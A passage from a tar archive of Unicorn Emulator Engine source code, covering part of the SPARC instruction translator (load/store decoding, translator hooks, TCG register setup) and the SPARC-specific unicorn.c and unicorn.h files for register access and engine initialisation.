gen_dest_gpr(dc, rd); switch (xop) { case 0x0: /* ld, V9 lduw, load unsigned word */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld32u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x1: /* ldub, load unsigned byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld8u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x2: /* lduh, load unsigned halfword */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld16u(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x3: /* ldd, load double word */ if (rd & 1) goto illegal_insn; else { TCGv_i64 t64; gen_address_mask(dc, cpu_addr); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, t64, cpu_addr, dc->mem_idx); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); gen_store_gpr(dc, rd + 1, cpu_val); tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); tcg_temp_free_i64(tcg_ctx, t64); tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); } break; case 0x9: /* ldsb, load signed byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld8s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0xa: /* ldsh, load signed halfword */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld16s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0xd: /* ldstub */ gen_ldstub(dc, cpu_val, cpu_addr, dc->mem_idx); break; case 0x0f: /* swap, swap register with memory. Also atomically */ CHECK_IU_FEATURE(dc, SWAP); cpu_src1 = gen_load_gpr(dc, rd); gen_swap(dc, cpu_val, cpu_src1, cpu_addr, dc->mem_idx, MO_TEUL); break; case 0x10: /* lda, V9 lduwa, load word alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEUL); break; case 0x11: /* lduba, load unsigned byte alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_UB); break; case 0x12: /* lduha, load unsigned halfword alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEUW); break; case 0x13: /* ldda, load double word alternate */ if (rd & 1) { goto illegal_insn; } gen_ldda_asi(dc, cpu_addr, insn, rd); goto skip_move; case 0x19: /* ldsba, load signed byte alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_SB); break; case 0x1a: /* ldsha, load signed halfword alternate */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TESW); break; case 0x1d: /* ldstuba -- XXX: should be atomically */ gen_ldstub_asi(dc, cpu_val, cpu_addr, insn); break; case 0x1f: /* swapa, swap reg with alt. memory. Also atomically */ CHECK_IU_FEATURE(dc, SWAP); cpu_src1 = gen_load_gpr(dc, rd); gen_swap_asi(dc, cpu_val, cpu_src1, cpu_addr, insn); break; #ifndef TARGET_SPARC64 case 0x30: /* ldc */ case 0x31: /* ldcsr */ case 0x33: /* lddc */ goto ncp_insn; #endif #ifdef TARGET_SPARC64 case 0x08: /* V9 ldsw */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld32s(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x0b: /* V9 ldx */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_ld64(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x18: /* V9 ldswa */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TESL); break; case 0x1b: /* V9 ldxa */ gen_ld_asi(dc, cpu_val, cpu_addr, insn, MO_TEQ); break; case 0x2d: /* V9 prefetch, no effect */ goto skip_move; case 0x30: /* V9 ldfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 4, rd); gen_update_fprs_dirty(dc, rd); goto skip_move; case 0x33: /* V9 lddfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); gen_update_fprs_dirty(dc, DFPREG(rd)); goto skip_move; case 0x3d: /* V9 prefetcha, no effect */ goto skip_move; case 0x32: /* V9 ldqfa */ CHECK_FPU_FEATURE(dc, FLOAT128); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_ldf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); goto skip_move; #endif default: goto illegal_insn; } gen_store_gpr(dc, rd, cpu_val); skip_move: ; } else if (xop >= 0x20 && xop < 0x24) { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (xop) { case 0x20: /* ldf, load fpreg */ gen_address_mask(dc, cpu_addr); cpu_dst_32 = gen_dest_fpr_F(dc); tcg_gen_qemu_ld_i32(tcg_ctx, cpu_dst_32, cpu_addr, dc->mem_idx, MO_TEUL); gen_store_fpr_F(dc, rd, cpu_dst_32); break; case 0x21: /* ldfsr, V9 ldxfsr */ #ifdef TARGET_SPARC64 gen_address_mask(dc, cpu_addr); if (rd == 1) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t64, cpu_addr, dc->mem_idx, MO_TEQ); gen_helper_ldxfsr(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, tcg_ctx->cpu_fsr, t64); tcg_temp_free_i64(tcg_ctx, t64); break; } #endif cpu_dst_32 = get_temp_i32(dc); tcg_gen_qemu_ld_i32(tcg_ctx, cpu_dst_32, cpu_addr, dc->mem_idx, MO_TEUL); gen_helper_ldfsr(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, tcg_ctx->cpu_fsr, cpu_dst_32); break; case 0x22: /* ldqf, load quad fpreg */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_address_mask(dc, cpu_addr); cpu_src1_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, 8); cpu_src2_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_src2_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); gen_store_fpr_Q(dc, rd, cpu_src1_64, cpu_src2_64); tcg_temp_free_i64(tcg_ctx, cpu_src1_64); tcg_temp_free_i64(tcg_ctx, cpu_src2_64); break; case 0x23: /* lddf, load double fpreg */ gen_address_mask(dc, cpu_addr); cpu_dst_64 = gen_dest_fpr_D(dc, rd); tcg_gen_qemu_ld_i64(tcg_ctx, cpu_dst_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); gen_store_fpr_D(dc, rd, cpu_dst_64); break; default: goto illegal_insn; } } else if (xop < 8 || (xop >= 0x14 && xop < 0x18) || xop == 0xe || xop == 0x1e) { TCGv cpu_val = gen_load_gpr(dc, rd); switch (xop) { case 0x4: /* st, store word */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st32(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x5: /* stb, store byte */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st8(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x6: /* sth, store halfword */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st16(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x7: /* std, store double word */ if (rd & 1) goto illegal_insn; else { TCGv_i64 t64; TCGv lo; gen_address_mask(dc, cpu_addr); lo = gen_load_gpr(dc, rd + 1); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, cpu_val); tcg_gen_qemu_st64(tcg_ctx, t64, cpu_addr, dc->mem_idx); tcg_temp_free_i64(tcg_ctx, t64); } break; case 0x14: /* sta, V9 stwa, store word alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEUL); break; case 0x15: /* stba, store byte alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_UB); break; case 0x16: /* stha, store halfword alternate */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEUW); break; case 0x17: /* stda, store double word alternate */ if (rd & 1) { goto illegal_insn; } gen_stda_asi(dc, cpu_val, cpu_addr, insn, rd); break; #ifdef TARGET_SPARC64 case 0x0e: /* V9 stx */ gen_address_mask(dc, cpu_addr); tcg_gen_qemu_st64(tcg_ctx, cpu_val, cpu_addr, dc->mem_idx); break; case 0x1e: /* V9 stxa */ gen_st_asi(dc, cpu_val, cpu_addr, insn, MO_TEQ); break; #endif default: goto illegal_insn; } } else if (xop > 0x23 && xop < 0x28) { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (xop) { case 0x24: /* stf, store fpreg */ gen_address_mask(dc, cpu_addr); cpu_src1_32 = gen_load_fpr_F(dc, rd); tcg_gen_qemu_st_i32(tcg_ctx, cpu_src1_32, cpu_addr, dc->mem_idx, MO_TEUL); break; case 0x25: /* stfsr, V9 stxfsr */ { #ifdef TARGET_SPARC64 gen_address_mask(dc, cpu_addr); if (rd == 1) { tcg_gen_qemu_st64(tcg_ctx, tcg_ctx->cpu_fsr, cpu_addr, dc->mem_idx); break; } #endif tcg_gen_qemu_st32(tcg_ctx, tcg_ctx->cpu_fsr, cpu_addr, dc->mem_idx); } break; case 0x26: #ifdef TARGET_SPARC64 /* V9 stqf, store quad fpreg */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_address_mask(dc, cpu_addr); /* ??? While stqf only requires 4-byte alignment, it is legal for the cpu to signal the unaligned exception. The OS trap handler is then required to fix it up. For qemu, this avoids having to probe the second page before performing the first write. */ cpu_src1_64 = gen_load_fpr_Q0(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, 8); cpu_src2_64 = gen_load_fpr_Q1(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ); break; #else /* !TARGET_SPARC64 */ /* stdfq, store floating point queue */ if (!supervisor(dc)) goto priv_insn; if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } goto nfq_insn; #endif case 0x27: /* stdf, store double fpreg */ gen_address_mask(dc, cpu_addr); cpu_src1_64 = gen_load_fpr_D(dc, rd); tcg_gen_qemu_st_i64(tcg_ctx, cpu_src1_64, cpu_addr, dc->mem_idx, MO_TEQ | MO_ALIGN_4); break; default: goto illegal_insn; } } else if (xop > 0x33 && xop < 0x3f) { switch (xop) { #ifdef TARGET_SPARC64 case 0x34: /* V9 stfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 4, rd); break; case 0x36: /* V9 stqfa */ { CHECK_FPU_FEATURE(dc, FLOAT128); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); } break; case 0x37: /* V9 stdfa */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_stf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); break; case 0x3e: /* V9 casxa */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); gen_casx_asi(dc, cpu_addr, cpu_src2, insn, rd); break; #else case 0x34: /* stc */ case 0x35: /* stcsr */ case 0x36: /* stdcq */ case 0x37: /* stdc */ goto ncp_insn; #endif case 0x3c: /* V9 or LEON3 casa */ #ifndef TARGET_SPARC64 CHECK_IU_FEATURE(dc, CASA); #endif rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); gen_cas_asi(dc, cpu_addr, cpu_src2, insn, rd); break; default: goto illegal_insn; } } else { goto illegal_insn; } } break; } /* default case for non jump instructions */ if (dc->npc == DYNAMIC_PC) { dc->pc = DYNAMIC_PC; gen_op_next_insn(tcg_ctx); } else if (dc->npc == JUMP_PC) { /* we can do a static jump */ gen_branch2(dc, dc->jump_pc[0], dc->jump_pc[1], tcg_ctx->cpu_cond); dc->base.is_jmp = DISAS_NORETURN; } else { dc->pc = dc->npc; dc->npc = dc->npc + 4; } jmp_insn: goto egress; illegal_insn: gen_exception(dc, TT_ILL_INSN); goto egress; unimp_flush: gen_exception(dc, TT_UNIMP_FLUSH); goto egress; priv_insn: gen_exception(dc, TT_PRIV_INSN); goto egress; nfpu_insn: gen_op_fpexception_im(dc, FSR_FTT_UNIMPFPOP); goto egress; #if !defined(TARGET_SPARC64) nfq_insn: gen_op_fpexception_im(dc, FSR_FTT_SEQ_ERROR); goto egress; #endif #ifndef TARGET_SPARC64 ncp_insn: gen_exception(dc, TT_NCP_INSN); goto egress; #endif egress: if (dc->n_t32 != 0) { int i; for (i = dc->n_t32 - 1; i >= 0; --i) { tcg_temp_free_i32(tcg_ctx, dc->t32[i]); } dc->n_t32 = 0; } if (dc->n_ttl != 0) { int i; for (i = dc->n_ttl - 1; i >= 0; --i) { tcg_temp_free(tcg_ctx, dc->ttl[i]); } dc->n_ttl = 0; } } static void sparc_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUSPARCState *env = cs->env_ptr; int bound; // unicorn setup dc->uc = cs->uc; dc->pc = dc->base.pc_first; dc->npc = (target_ulong)dc->base.tb->cs_base; dc->cc_op = CC_OP_DYNAMIC; dc->mem_idx = dc->base.tb->flags & TB_FLAG_MMU_MASK; dc->def = &env->def; dc->fpu_enabled = tb_fpu_enabled(dc->base.tb->flags); dc->address_mask_32bit = tb_am_enabled(dc->base.tb->flags); dc->supervisor = (dc->base.tb->flags & TB_FLAG_SUPER) != 0; #ifdef TARGET_SPARC64 dc->fprs_dirty = 0; dc->asi = (dc->base.tb->flags >> TB_FLAG_ASI_SHIFT) & 0xff; #endif /* * if we reach a page boundary, we stop generation so that the * PC of a TT_TFAULT exception is always in the right page */ #ifdef _MSC_VER bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif dc->base.max_insns = MIN(dc->base.max_insns, bound); } static void sparc_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void sparc_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->npc & JUMP_PC) { assert(dc->jump_pc[1] == dc->pc + 4); tcg_gen_insn_start(tcg_ctx, dc->pc, dc->jump_pc[0] | JUMP_PC); } else { tcg_gen_insn_start(tcg_ctx, dc->pc, dc->npc); } } static bool sparc_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->pc != dc->base.pc_first) { save_state(dc); } gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; /* update pc_next so that the current instruction is included in tb->size */ dc->base.pc_next += 4; return true; } static void sparc_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUSPARCState *env = cs->env_ptr; unsigned int insn; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dc->pc)) { #ifndef TARGET_SPARC64 gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); #endif dcbase->is_jmp = DISAS_NORETURN; return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->pc)) { // Sync PC in advance tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, dc->pc); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } insn = translator_ldl(tcg_ctx, env, dc->pc); dc->base.pc_next += 4; disas_sparc_insn(dc, insn); if (dc->base.is_jmp == DISAS_NORETURN) { return; } if (dc->pc != dc->base.pc_next) { dc->base.is_jmp = DISAS_TOO_MANY; } } static void sparc_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: if (dc->pc != DYNAMIC_PC && (dc->npc != DYNAMIC_PC && dc->npc != JUMP_PC)) { /* static PC and NPC: we can use direct chaining */ gen_goto_tb(dc, 0, dc->pc, dc->npc); } else { if (dc->pc != DYNAMIC_PC) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dc->pc); } save_npc(dc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } break; case DISAS_NORETURN: break; case DISAS_EXIT: /* Exit TB */ save_state(dc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; default: g_assert_not_reached(); } } static const TranslatorOps sparc_tr_ops = { .init_disas_context = sparc_tr_init_disas_context, .tb_start = sparc_tr_tb_start, .insn_start = sparc_tr_insn_start, .breakpoint_check = sparc_tr_breakpoint_check, .translate_insn = sparc_tr_translate_insn, .tb_stop = sparc_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext dc = { 0 }; translator_loop(&sparc_tr_ops, &dc.base, cs, tb, max_insns); } void sparc_tcg_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; static const char gregnames[32][4] = { "g0", "g1", "g2", "g3", "g4", "g5", "g6", "g7", "o0", "o1", "o2", "o3", "o4", "o5", "o6", "o7", "l0", "l1", "l2", "l3", "l4", "l5", "l6", "l7", "i0", "i1", "i2", "i3", "i4", "i5", "i6", "i7", }; static const char fregnames[32][4] = { "f0", "f2", "f4", "f6", "f8", "f10", "f12", "f14", "f16", "f18", "f20", "f22", "f24", "f26", "f28", "f30", "f32", "f34", "f36", "f38", "f40", "f42", "f44", "f46", "f48", "f50", "f52", "f54", "f56", "f58", "f60", "f62", }; static struct { TCGv_i32 *ptr; int off; const char *name; } r32[] = { { NULL /* &tcg_ctx->cpu_cc_op */, offsetof(CPUSPARCState, cc_op), "cc_op" }, { NULL /* &tcg_ctx->cpu_psr */, offsetof(CPUSPARCState, psr), "psr" }, #ifdef TARGET_SPARC64 { NULL /* &tcg_ctx->cpu_xcc */, offsetof(CPUSPARCState, xcc), "xcc" }, { NULL /* &tcg_ctx->cpu_fprs */, offsetof(CPUSPARCState, fprs), "fprs" }, #else { NULL /* &tcg_ctx->cpu_wim */, offsetof(CPUSPARCState, wim), "wim" }, #endif }; static struct { TCGv *ptr; int off; const char *name; } rtl[] = { { NULL /* &tcg_ctx->cpu_cond */, offsetof(CPUSPARCState, cond), "cond" }, { NULL /* &tcg_ctx->cpu_cc_src */, offsetof(CPUSPARCState, cc_src), "cc_src" }, { NULL /* &tcg_ctx->cpu_cc_src2 */, offsetof(CPUSPARCState, cc_src2), "cc_src2" }, { NULL /* &tcg_ctx->cpu_cc_dst */, offsetof(CPUSPARCState, cc_dst), "cc_dst" }, { NULL /* &tcg_ctx->cpu_fsr */, offsetof(CPUSPARCState, fsr), "fsr" }, { NULL /* &tcg_ctx->cpu_pc */, offsetof(CPUSPARCState, pc), "pc" }, { NULL /* &tcg_ctx->cpu_npc */, offsetof(CPUSPARCState, npc), "npc" }, { NULL /* &tcg_ctx->cpu_y */, offsetof(CPUSPARCState, y), "y" }, { NULL /* &tcg_ctx->cpu_tbr */, offsetof(CPUSPARCState, tbr), "tbr" }, #ifdef TARGET_SPARC64 { NULL /* &tcg_ctx->cpu_gsr */, offsetof(CPUSPARCState, gsr), "gsr" }, { NULL /* &tcg_ctx->cpu_tick_cmpr */, offsetof(CPUSPARCState, tick_cmpr), "tick_cmpr" }, { NULL /* &tcg_ctx->cpu_stick_cmpr */, offsetof(CPUSPARCState, stick_cmpr), "stick_cmpr" }, { NULL /* &tcg_ctx->cpu_hstick_cmpr */, offsetof(CPUSPARCState, hstick_cmpr), "hstick_cmpr" }, { NULL /* &tcg_ctx->cpu_hintp */, offsetof(CPUSPARCState, hintp), "hintp" }, { NULL /* &tcg_ctx->cpu_htba */, offsetof(CPUSPARCState, htba), "htba" }, { NULL /* &tcg_ctx->cpu_hver */, offsetof(CPUSPARCState, hver), "hver" }, { NULL /* &tcg_ctx->cpu_ssr */, offsetof(CPUSPARCState, ssr), "ssr" }, { NULL /* &tcg_ctx->cpu_ver */, offsetof(CPUSPARCState, version), "ver" }, #endif }; unsigned int i; r32[0].ptr = &tcg_ctx->cpu_cc_op; r32[1].ptr = &tcg_ctx->cpu_psr; #ifdef TARGET_SPARC64 r32[2].ptr = &tcg_ctx->cpu_xcc; r32[3].ptr = &tcg_ctx->cpu_fprs; #else r32[2].ptr = &tcg_ctx->cpu_wim; #endif rtl[0].ptr = &tcg_ctx->cpu_cond; rtl[1].ptr = &tcg_ctx->cpu_cc_src; rtl[2].ptr = &tcg_ctx->cpu_cc_src2; rtl[3].ptr = &tcg_ctx->cpu_cc_dst; rtl[4].ptr = &tcg_ctx->cpu_fsr; rtl[5].ptr = &tcg_ctx->cpu_pc; rtl[6].ptr = &tcg_ctx->cpu_npc; rtl[7].ptr = &tcg_ctx->cpu_y; rtl[8].ptr = &tcg_ctx->cpu_tbr; #ifdef TARGET_SPARC64 rtl[9].ptr = &tcg_ctx->cpu_gsr; rtl[10].ptr = &tcg_ctx->cpu_tick_cmpr; rtl[11].ptr = &tcg_ctx->cpu_stick_cmpr; rtl[12].ptr = &tcg_ctx->cpu_hstick_cmpr; rtl[13].ptr = &tcg_ctx->cpu_hintp; rtl[14].ptr = &tcg_ctx->cpu_htba; rtl[15].ptr = &tcg_ctx->cpu_hver; rtl[16].ptr = &tcg_ctx->cpu_ssr; rtl[17].ptr = &tcg_ctx->cpu_ver; #endif tcg_ctx->cpu_regwptr = tcg_global_mem_new_ptr(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, regwptr), "regwptr"); for (i = 0; i < ARRAY_SIZE(r32); ++i) { *r32[i].ptr = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, r32[i].off, r32[i].name); } for (i = 0; i < ARRAY_SIZE(rtl); ++i) { *rtl[i].ptr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, rtl[i].off, rtl[i].name); } tcg_ctx->cpu_regs[0] = NULL; for (i = 1; i < 8; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, gregs[i]), gregnames[i]); } for (i = 8; i < 32; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_regwptr, (i - 8) * sizeof(target_ulong), gregnames[i]); } for (i = 0; i < TARGET_DPREGS; i++) { tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUSPARCState, fpr[i]), fregnames[i]); } } void restore_state_to_opc(CPUSPARCState *env, TranslationBlock *tb, target_ulong *data) { target_ulong pc = data[0]; target_ulong npc = data[1]; env->pc = pc; if (npc == DYNAMIC_PC) { /* dynamic NPC: already stored */ } else if (npc & JUMP_PC) { /* jump PC: use 'cond' and the jump targets of the translation */ if (env->cond) { env->npc = npc & ~3; } else { env->npc = pc + 4; } } else { env->npc = npc; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/unicorn.c�����������������������������������������������������������0000664�0000000�0000000�00000010442�14675241067�0020373�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" static bool sparc_stop_interrupt(struct uc_struct *uc, int intno) { switch (intno) { default: return false; case TT_ILL_INSN: return true; } } static void sparc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUSPARCState *)uc->cpu->env_ptr)->pc = address; ((CPUSPARCState *)uc->cpu->env_ptr)->npc = address + 4; } static uint64_t sparc_get_pc(struct uc_struct *uc) { return ((CPUSPARCState *)uc->cpu->env_ptr)->pc; } static void sparc_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; SPARCCPU *cpu = (SPARCCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->gregs, 0, sizeof(env->gregs)); memset(env->fpr, 0, sizeof(env->fpr)); memset(env->regbase, 0, sizeof(env->regbase)); env->pc = 0; env->npc = 0; env->regwptr = env->regbase; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->gregs[regid - UC_SPARC_REG_G0]; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regwptr[regid - UC_SPARC_REG_O0]; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regwptr[8 + regid - UC_SPARC_REG_L0]; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { *(uint32_t *)value = env->regwptr[16 + regid - UC_SPARC_REG_I0]; } else { switch (regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUSPARCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) { CHECK_REG_TYPE(uint32_t); env->gregs[regid - UC_SPARC_REG_G0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) { CHECK_REG_TYPE(uint32_t); env->regwptr[regid - UC_SPARC_REG_O0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) { CHECK_REG_TYPE(uint32_t); env->regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint32_t *)value; } else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) { CHECK_REG_TYPE(uint32_t); env->regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_SPARC_REG_PC: CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; env->npc = *(uint32_t *)value + 4; *setpc = 1; break; } } return ret; } static int sparc_cpus_init(struct uc_struct *uc, const char *cpu_model) { SPARCCPU *cpu; cpu = cpu_sparc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = sparc_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = sparc_set_pc; uc->get_pc = sparc_get_pc; uc->stop_interrupt = sparc_stop_interrupt; uc->cpus_init = sparc_cpus_init; uc->cpu_context_size = offsetof(CPUSPARCState, irq_manager); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/unicorn.h�����������������������������������������������������������0000664�0000000�0000000�00000001412�14675241067�0020375�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_SPARC_H #define UC_QEMU_TARGET_SPARC_H // functions to read & write registers uc_err reg_read_sparc(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_sparc64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_sparc(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_sparc64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_sparc(struct uc_struct *uc); void uc_init_sparc64(struct uc_struct *uc); #endif 